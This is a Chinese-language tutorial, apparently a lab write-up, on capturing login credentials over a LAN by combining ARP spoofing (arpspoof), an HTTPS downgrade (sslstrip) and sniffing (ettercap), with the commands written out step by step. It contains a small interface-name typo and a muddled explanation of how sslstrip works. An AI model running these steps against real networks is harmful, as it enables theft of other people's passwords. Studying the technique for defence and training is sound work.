Kali获取HTTP/HTTPS账号密码获取实验


此次实验需要配合arp欺骗,对arp欺骗一脸懵的可以参考我以前写的帖子

传送门

这里介绍一下http/https协议:

   http:   1. 无状态:协议对客户端没有状态存储,对事物处理没有“记忆”能力,比如访问一个网站需要反复进行登录操作
	        2. 无连接:HTTP/1.1之前,由于无状态特点,每次请求需要通过TCP三次握手四次挥手,和服务器重新建立连接。				                 
	        3. 基于请求和响应:基本的特性,由客户端发起请求,服务端响应
	        4. 简单快速、灵活
	        5. 通信使用明文、请求和响应不会对通信方进行确认、无法保护数据的完整性
	        6. 多次请求同一个资源,服务器并不能区别是否已经响应过用户的请求,所以每次需要重新响应请求,需要耗费不必要的时间和流量。
	        简单来说 HTTP协议是进行明文传输的,即在传输过程中不对数据进行加密,因为http的不安全性,所以在局域网环境中,可以通过ARP欺骗,将目标主机的网络数据包都流经攻击者,然后再通过嗅探的方式从而获取到HTTP的一些数据信息。下面主要是利用ettercap来进行嗅探
	       
   https:   基于HTTP协议,通过SSL或TLS提供加密处理数据、验证对方身份以及数据完整性保护,而且https内容传输加密:采用混合加密技术,中间者无法直接查看明文内容,相比http,https能很好保护数据完整性,防止传输的内容被中间人冒充或者篡改

实验环境

攻击机:linux Kali
靶机:window 10
网络环境:虚拟机桥接
网关:192.168.31.1

实验步骤

1.到Kali中开启转发流量不然arp欺骗后靶机会无法访问网络!:

echo 1 > /proc/sys/net/ipv4/ip_forward

cat 查看,显示1 证明开启成功
Kali获取HTTP/HTTPS账号密码获取实验_第1张图片

2.因为我们也需要对https网站进行嗅探,但由于https的安全特性,所以我们需要到Kali更改Sslstrip 配置文件,然后把https转换为http,使用sslstrip进行转换

/ /Sslstrip, 主要是使用中间人攻击方式,在客户端到 服务器之间设置一个代理服务器,然后代理服务器会使用其相应的有效 SSL 证书连接客户端到真实服务器,所以从而绕过服务端的检测**

   命令行输入: vim  /etc/ettercap/etter.conf 

Kali获取HTTP/HTTPS账号密码获取实验_第2张图片
vim进入后,按下 i 键,进入编辑模式,找到#if you use iptables:下面的两个#注释去掉。然后按下Esc,Shift+:(冒号),wq(保存,退出)

3.使用sslstrip

sslstrip -a -f -k

Kali获取HTTP/HTTPS账号密码获取实验_第3张图片
4.接下来进行arp欺骗

先看看arp欺骗前的网关Mac

windown 10 cmd 输入:arp -a

Kali获取HTTP/HTTPS账号密码获取实验_第4张图片
可以看到欺骗前的网关Mac地址正常,没有收到污染,接下来开始arp欺骗

arpspoof -i ech0 -t 192.168.31.111 192.168.31.1
arpspoof -i ech0(网卡)  -t  目标机ip  本地局域网关				

Kali获取HTTP/HTTPS账号密码获取实验_第5张图片
再次查看网关Mac
Kali获取HTTP/HTTPS账号密码获取实验_第6张图片
5.欺骗成功,然后利用ettercap进行https/http密码嗅探

Kali终端输入:ettercap -Tq -i eth0
-T:启动文本模式  q:安静模式  -i:攻击机网卡

登录一个https网站
Kali获取HTTP/HTTPS账号密码获取实验_第7张图片
当靶机有人登录https协议的网站的时候账号密码都会在上面显示的了
Kali获取HTTP/HTTPS账号密码获取实验_第8张图片
成功嗅探登录用户名及密码

你可能感兴趣的:(Kali获取HTTP/HTTPS账号密码获取实验)